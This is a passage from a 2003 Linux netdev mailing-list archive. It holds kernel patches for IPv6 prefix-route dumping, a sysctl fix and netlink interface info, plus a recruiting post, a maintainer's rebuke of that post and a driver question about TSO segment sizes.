rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1539,10 +1546,17 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1690,7 +1704,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { 
err = -EMSGSIZE; goto out_free; @@ -1716,7 +1730,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From tiffanyg@ix.netcom.com Mon Jul 21 19:14:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 19:14:40 -0700 (PDT) Received: from dewey.paralynx.net (dewey.mindlink.net [204.174.16.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6M2ERFl021671 for ; Mon, 21 Jul 2003 19:14:34 -0700 Received: from [65.219.25.34] (helo=tiffany) by dewey.paralynx.net with smtp (Exim 4.20) id 19emfT-0005SB-SJ for netdev@oss.sgi.com; Mon, 21 Jul 2003 19:14:20 -0700 From: "Tiffany Goodyear" To: Subject: Looking for some Strong Engineers Date: Mon, 21 Jul 2003 19:14:05 -0700 Message-ID: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-archive-position: 4211 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tiffanyg@ix.netcom.com Precedence: bulk X-list: netdev Hello all, My name is Tiffany Goodyear and I am helping a start-up company in San Jose find a Distributed File System Engineer and a few Senior Kernel Engineers. They are a small, well funded startup company working to build the next generation storage product. This would be an opportunity to come in and the ground floor and make a difference. The Distributed File System Engineer will be a key contributor to the design and implementation of our scalable distributed file system. 
Must have experience in designing complex system software, operating system kernel development, RAID, and distributed lock management. The kernel engineers will be responsible for overall performance and stability of the their operating system kernel. Must be very familiar with Unix/Linux operating system kernel development, kernel debugging, performance analysis, and kernel fault containment. This is a kernel development position. If anyone you know may be interested in any of these opportunities, please contact me and have them forward an updated version of their resume. I would be glad to discuss the opportunity and the company further. Looking forward to hearing from you soon. Tiffany Goodyear Recruiting Consultant 408-858-7154 From davem@redhat.com Mon Jul 21 19:45:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 19:45:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6M2jaFl023507 for ; Mon, 21 Jul 2003 19:45:37 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA05971; Mon, 21 Jul 2003 19:43:25 -0700 Date: Mon, 21 Jul 2003 19:43:24 -0700 From: "David S. Miller" To: "Tiffany Goodyear" Cc: netdev@oss.sgi.com Subject: Re: Looking for some Strong Engineers Message-Id: <20030721194324.430efdc3.davem@redhat.com> In-Reply-To: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> References: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4212 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Using this list to solicit for employment is not appropriate. Please don't do it again. 
Thank you. From kaber@trash.net Tue Jul 22 08:34:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 08:35:02 -0700 (PDT) Received: from gw.localnet (port-212-202-53-133.reverse.qsc.de [212.202.53.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MFYhFl020223 for ; Tue, 22 Jul 2003 08:34:51 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19ez8h-0000Nm-00; Tue, 22 Jul 2003 17:33:19 +0200 Message-ID: <3F1D59B4.3080307@trash.net> Date: Tue, 22 Jul 2003 17:35:16 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Debian/1.4-1 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: [PATCH]: fix no_cong_thresh sysctl Content-Type: multipart/mixed; boundary="------------090200040508000909040906" X-archive-position: 4213 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------090200040508000909040906 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi David, these two patches fix the net.core.no_cong_thresh sysctl, the value accessed is in fact no_cong. 
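A minimal user-space sketch of the aliasing described here, not part of the patches themselves. The `demo_ctl` structure, the table names and the initial values are hypothetical stand-ins for the real sysctl table; the only point is that two entries sharing one data pointer means that writing either name changes the same variable.

```c
#include <stddef.h>

/* Hypothetical stand-in for one sysctl table entry. */
struct demo_ctl {
    const char *procname;
    int *data;
};

/* Stand-ins for the two kernel variables; the values are arbitrary. */
static int demo_no_cong_thresh = 10;
static int demo_no_cong = 20;

/* Table as described in the report: both names point at demo_no_cong. */
struct demo_ctl demo_table_buggy[] = {
    { .procname = "no_cong_thresh", .data = &demo_no_cong },
    { .procname = "no_cong",        .data = &demo_no_cong },
    { .procname = NULL,             .data = NULL },
};

/* Table after the fix: each name has its own variable. */
struct demo_ctl demo_table_fixed[] = {
    { .procname = "no_cong_thresh", .data = &demo_no_cong_thresh },
    { .procname = "no_cong",        .data = &demo_no_cong },
    { .procname = NULL,             .data = NULL },
};

/* Returns the index of the first entry whose data pointer duplicates an
 * earlier entry, or -1 if every entry has distinct storage. */
int demo_find_alias(const struct demo_ctl *t)
{
    size_t i, j;

    for (i = 0; t[i].procname != NULL; i++)
        for (j = 0; j < i; j++)
            if (t[j].data == t[i].data)
                return (int)i;
    return -1;
}
```

Running `demo_find_alias()` over the first table reports entry 1 as an alias of entry 0; over the second table it finds none.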
Best regards,
Patrick

--------------090200040508000909040906
Content-Type: text/plain; name="linux-2.4.21-sysctl_net_core-no_cong_thresh.diff"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="linux-2.4.21-sysctl_net_core-no_cong_thresh.diff"

===== net/core/sysctl_net_core.c 1.4 vs edited =====
--- 1.4/net/core/sysctl_net_core.c Wed Aug 7 18:17:09 2002
+++ edited/net/core/sysctl_net_core.c Tue Jul 22 16:50:29 2003
@@ -55,7 +55,7 @@
 	 &netdev_max_backlog, sizeof(int), 0644, NULL,
 	 &proc_dointvec},
 	{NET_CORE_NO_CONG_THRESH, "no_cong_thresh",
-	 &no_cong, sizeof(int), 0644, NULL,
+	 &no_cong_thresh, sizeof(int), 0644, NULL,
 	 &proc_dointvec},
 	{NET_CORE_NO_CONG, "no_cong",
 	 &no_cong, sizeof(int), 0644, NULL,

--------------090200040508000909040906
Content-Type: text/plain; name="linux-2.5.75-sysctl_net_core-no_cong_thresh.diff"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="linux-2.5.75-sysctl_net_core-no_cong_thresh.diff"

===== net/core/sysctl_net_core.c 1.4 vs edited =====
--- 1.4/net/core/sysctl_net_core.c Wed Apr 30 08:44:14 2003
+++ edited/net/core/sysctl_net_core.c Tue Jul 22 16:51:35 2003
@@ -86,7 +86,7 @@
 	{
 		.ctl_name = NET_CORE_NO_CONG_THRESH,
 		.procname = "no_cong_thresh",
-		.data = &no_cong,
+		.data = &no_cong_thresh,
 		.maxlen = sizeof(int),
 		.mode = 0644,
 		.proc_handler = &proc_dointvec

--------------090200040508000909040906--

From alan@storlinksemi.com Tue Jul 22 10:18:39 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 10:18:43 -0700 (PDT)
Received: from smtp014.mail.yahoo.com (smtp014.mail.yahoo.com [216.136.173.58]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MHIdFl024603 for ; Tue, 22 Jul 2003 10:18:39 -0700
Received: from adsl-63-203-236-74.dsl.snfc21.pacbell.net (HELO AlanLap) (alansuntzishih@63.203.236.74 with login) by smtp.mail.vip.sc5.yahoo.com with SMTP; 22 Jul 2003 17:18:38 -0000
From: "Alan Shih"
To:
Subject: FW: Limit skb to be less than 64K with TSO
Date: Tue, 22 Jul 2003 10:18:32 -0700
Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300 Importance: Normal X-archive-position: 4214 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@storlinksemi.com Precedence: bulk X-list: netdev I am lost at the following situation: Env: I am writing driver + smart NIC's firmware. The smart NIC has limited memory. It can do checksum and TSO but with 32K max. Problem: SKB may be 64K in size when it reaches the driver. I cannot push all 64K to the NIC to do checksum. Is there a way to limit the network stack to give me only 32K or smaller segments? If I do checksum in the main processor, it defeats the purpose. TIA Alan From krkumar@us.ibm.com Tue Jul 22 14:53:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 14:53:58 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MLrfFl007975 for ; Tue, 22 Jul 2003 14:53:48 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MLqjwO148616; Tue, 22 Jul 2003 17:52:45 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MLqf6f135122; Tue, 22 Jul 2003 17:52:42 -0400 Date: Tue, 22 Jul 2003 14:50:21 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , , , KK Subject: O/M flags against 2.6.0-test1 In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4215 X-ecartis-version: Ecartis v1.0.0 
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: krkumar@us.ibm.com
Precedence: bulk
X-list: netdev

> I don't have any knowledge of using this new interface. Something like this.

Thanks Alexey, I have modelled the inet6 code on this. I hope it looks good.

IFLA_INET6_CONF (and IFLA_INET_CONF). How to encode the values?
> Array of int's is simple, compact and looks good. But I have some
> problem with it. What if one day we want to implement changing the
> values? It will be nasty.

I think this is the simplest method. For changing the values, isn't it
possible to reverse the direction of the memcpy, back into the structure?
Of course, we would need to make sure the values are legal, or that a 'get'
was done prior to the 'put', which does make it nasty.

Please let us to use some portable types instead of 'int' :-)

I am using sizeof(struct xxx), __u32, etc. in the code; I guess you are OK
with that.

I didn't add the statistics, though they could be implemented:

	RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), &idev->stats.icmpv6[0]);
	RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), &idev->stats.icmpv6[1]);

Would something like that work?
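The nesting scheme used for IFLA_PROTINFO in this patch (emit an empty container attribute, append the sub-attributes, then patch the container's length to cover them) can be sketched in user space roughly as follows. This is only an illustration under stated assumptions: `demo_attr`, `demo_buf` and the `demo_*` helpers are hypothetical stand-ins for `struct rtattr`, the skb and `RTA_PUT()`, and the attribute type numbers used with them are arbitrary.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for struct rtattr: length (header included), type. */
struct demo_attr {
    uint16_t len;
    uint16_t type;
};

#define DEMO_ALIGN(n) (((size_t)(n) + 3) & ~(size_t)3)
#define DEMO_HDRLEN   DEMO_ALIGN(sizeof(struct demo_attr))

/* Hypothetical message buffer; 'tail' plays the role of skb->tail. */
struct demo_buf {
    unsigned char data[256];
    size_t tail;
};

/* Append one attribute. Returns its offset, or -1 if it does not fit. */
long demo_put(struct demo_buf *b, uint16_t type, const void *payload, size_t plen)
{
    size_t start = b->tail;
    size_t total = DEMO_HDRLEN + plen;
    struct demo_attr hdr;

    if (start + DEMO_ALIGN(total) > sizeof(b->data))
        return -1;
    hdr.len = (uint16_t)total;
    hdr.type = type;
    memset(b->data + start, 0, DEMO_ALIGN(total));   /* zero the padding */
    memcpy(b->data + start, &hdr, sizeof(hdr));
    if (plen)
        memcpy(b->data + start + DEMO_HDRLEN, payload, plen);
    b->tail = start + DEMO_ALIGN(total);
    return (long)start;
}

/* Close a container opened with demo_put(b, type, NULL, 0): its length
 * is rewritten to cover everything appended since it was opened. */
void demo_nest_end(struct demo_buf *b, long container_off)
{
    struct demo_attr hdr;

    memcpy(&hdr, b->data + container_off, sizeof(hdr));
    hdr.len = (uint16_t)(b->tail - (size_t)container_off);
    memcpy(b->data + container_off, &hdr, sizeof(hdr));
}

/* Look up a sub-attribute inside a container. Returns a pointer to its
 * payload (and the payload length via plen), or NULL if it is absent. */
const void *demo_nest_find(const struct demo_buf *b, long container_off,
                           uint16_t type, size_t *plen)
{
    struct demo_attr outer, cur;
    size_t off, end;

    memcpy(&outer, b->data + container_off, sizeof(outer));
    off = (size_t)container_off + DEMO_HDRLEN;
    end = (size_t)container_off + outer.len;
    while (off + DEMO_HDRLEN <= end) {
        memcpy(&cur, b->data + off, sizeof(cur));
        if (cur.len < DEMO_HDRLEN || off + cur.len > end)
            break;                                   /* malformed attribute */
        if (cur.type == type) {
            if (plen)
                *plen = cur.len - DEMO_HDRLEN;
            return b->data + off + DEMO_HDRLEN;
        }
        off += DEMO_ALIGN(cur.len);
    }
    return NULL;
}
```

A reader on the other side walks only the bytes covered by the container's length, which is why the container header has to be patched after the last sub-attribute is written.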
Thanks, - KK ------------------------------------------------------------------------------ diff -ruN linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- linux-2.6.0-test1.plist/include/linux/rtnetlink.h 2003-07-22 13:59:17.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-22 10:50:42.000000000 -0700 @@ -477,10 +477,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -514,6 +516,18 @@ for IPIP tunnels, when route to endpoint is allowed to change) */ +/* Sub-attribute types for IFLA_PROTINFO */ +enum +{ + IFLA_INET6_UNSPEC, + IFLA_INET6_FLAGS, /* link flags */ + IFLA_INET6_CONF, /* sysctl parameters */ + IFLA_INET6_STATS, /* statistics */ + IFLA_INET6_MCAST, /* MC things. What of them? */ +}; + +#define IFLA_INET6_MAX IFLA_INET6_MCAST + /***************************************************************** * Traffic control messages. 
****/ diff -ruN linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- linux-2.6.0-test1.plist/net/ipv6/addrconf.c 2003-07-22 13:59:17.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-22 13:55:07.000000000 -0700 @@ -2510,7 +2510,77 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct inet6_dev *idev, + int type, u32 pid, u32 seq) +{ + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET6; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + subattr = (struct rtattr*)skb->tail; + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags); + /* + * XXX - any better way than using 'sizeof(struct) - n' below ? 
+ * - stats/multicast not implemented + */ + RTA_PUT(skb, IFLA_INET6_CONF, sizeof(idev->cnf) - sizeof(void *), + &idev->cnf); + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: +rtattr_failure: + skb_trim(skb, b - skb->data); + return -1; +} + +static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct inet6_dev *idev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((idev = in6_dev_get(dev)) == NULL) + continue; + err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK, + NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in6_dev_put(idev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, }, [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, [RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, }, From rudmer@legolas.dynup.net Tue Jul 22 15:06:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 15:06:11 -0700 (PDT) Received: from legolas.dynup.net (bv-n-3b5d.adsl.wanadoo.nl [212.129.187.93]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MM66Fl008867 for ; Tue, 22 Jul 2003 15:06:07 -0700 Received: (qmail 14303 invoked from network); 22 Jul 2003 22:20:58 -0000 Received: from unknown (HELO gandalf.middle-earth.net) (192.168.20.2) by legolas.dynup.net with SMTP; 22 Jul 2003 22:20:58 -0000 From: Rudmer van Dijk To: Jeff Garzik , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [BK PATCHES] more 2.6.x net driver merges Date: Wed, 23 Jul 2003 00:06:15 +0200 User-Agent: KMail/1.5.2 References: <20030720043948.GA20201@gtf.org> In-Reply-To: 
<20030720043948.GA20201@gtf.org> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307230006.15884.rudmer@legolas.dynup.net> X-archive-position: 4216 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rudmer@legolas.dynup.net Precedence: bulk X-list: netdev Hi, I have a Broadcom Corporation BCM4401 100Base-T (rev 01) NIC, it did not work with 2.6-vanilla or 2.6-mm but with this patch it works! thanks! Rudmer On Sunday 20 July 2003 06:39, Jeff Garzik wrote: > Added some more stuff at > > bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.6 > > Others may download the patch from > > ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.6/2.6.0 >-test1-netdrvr2.patch.bz2 > From yoshfuji@linux-ipv6.org Tue Jul 22 15:24:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 15:24:22 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MMOCFl009956 for ; Tue, 22 Jul 2003 15:24:13 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6MMPkBo009657; Wed, 23 Jul 2003 07:25:46 +0900 Date: Tue, 22 Jul 2003 18:25:45 -0400 (EDT) Message-Id: <20030722.182545.97160275.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: O/M flags against 2.6.0-test1 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <200307210155.FAA31320@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: 
"5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4217 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Tue, 22 Jul 2003 14:50:21 -0700 (PDT)), Krishna Kumar says: > I didn't add the statistics, though it can be implemented : > RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), > &idev->stats.icmpv6[0]); > RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), > &idev->stats.icmpv6[1]); > something like that would work ? I'd like to do this later, if you don't mind. --yoshfuji From krkumar@us.ibm.com Tue Jul 22 16:01:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 16:01:15 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MN13Fl011842 for ; Tue, 22 Jul 2003 16:01:10 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MN08Kb089562; Tue, 22 Jul 2003 19:00:09 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MN05ou274710; Tue, 22 Jul 2003 19:00:06 -0400 Message-ID: <3F1DC1E3.4060504@us.ibm.com> Date: Tue, 22 Jul 2003 15:59:47 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: =?windows-1252?Q?YOSHIFUJI_Hideaki_/_=3F=3F=3F=3F?= CC: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: O/M flags against 2.6.0-test1 References: 
<200307210155.FAA31320@dub.inr.ac.ru> <20030722.182545.97160275.yoshfuji@linux-ipv6.org> In-Reply-To: <20030722.182545.97160275.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-archive-position: 4218 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev I guess you are talking about the statistics part. This is fine with me. thx, - KK YOSHIFUJI Hideaki / ???? wrote: > In article (at Tue, 22 Jul 2003 14:50:21 -0700 (PDT)), Krishna Kumar says: > > >>I didn't add the statistics, though it can be implemented : >>RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), >> &idev->stats.icmpv6[0]); >>RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), >> &idev->stats.icmpv6[1]); >>something like that would work ? > > > I'd like to do this later, if you don't mind. > > --yoshfuji > From krkumar@us.ibm.com Tue Jul 22 16:55:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 16:55:45 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MNtXFl014856 for ; Tue, 22 Jul 2003 16:55:40 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MNsj4X221368; Tue, 22 Jul 2003 19:54:45 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MNsg6f076470; Tue, 22 Jul 2003 19:54:43 -0400 Date: Tue, 22 Jul 2003 16:52:24 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , Subject: [PATCH] Prefix List against 2.4.21 In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII 
X-archive-position: 4219 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev The same patch against 2.4.21. thanks, - KK ------------------------------------------------------------------------------ diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h linux-2.4.21.new/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ linux-2.4.21.new/include/linux/ipv6_route.h 2003-07-22 15:08:07.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h linux-2.4.21.new/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.21.new/include/linux/rtnetlink.h 2003-07-22 15:08:35.000000000 -0700 @@ -167,6 +167,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c linux-2.4.21.new/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 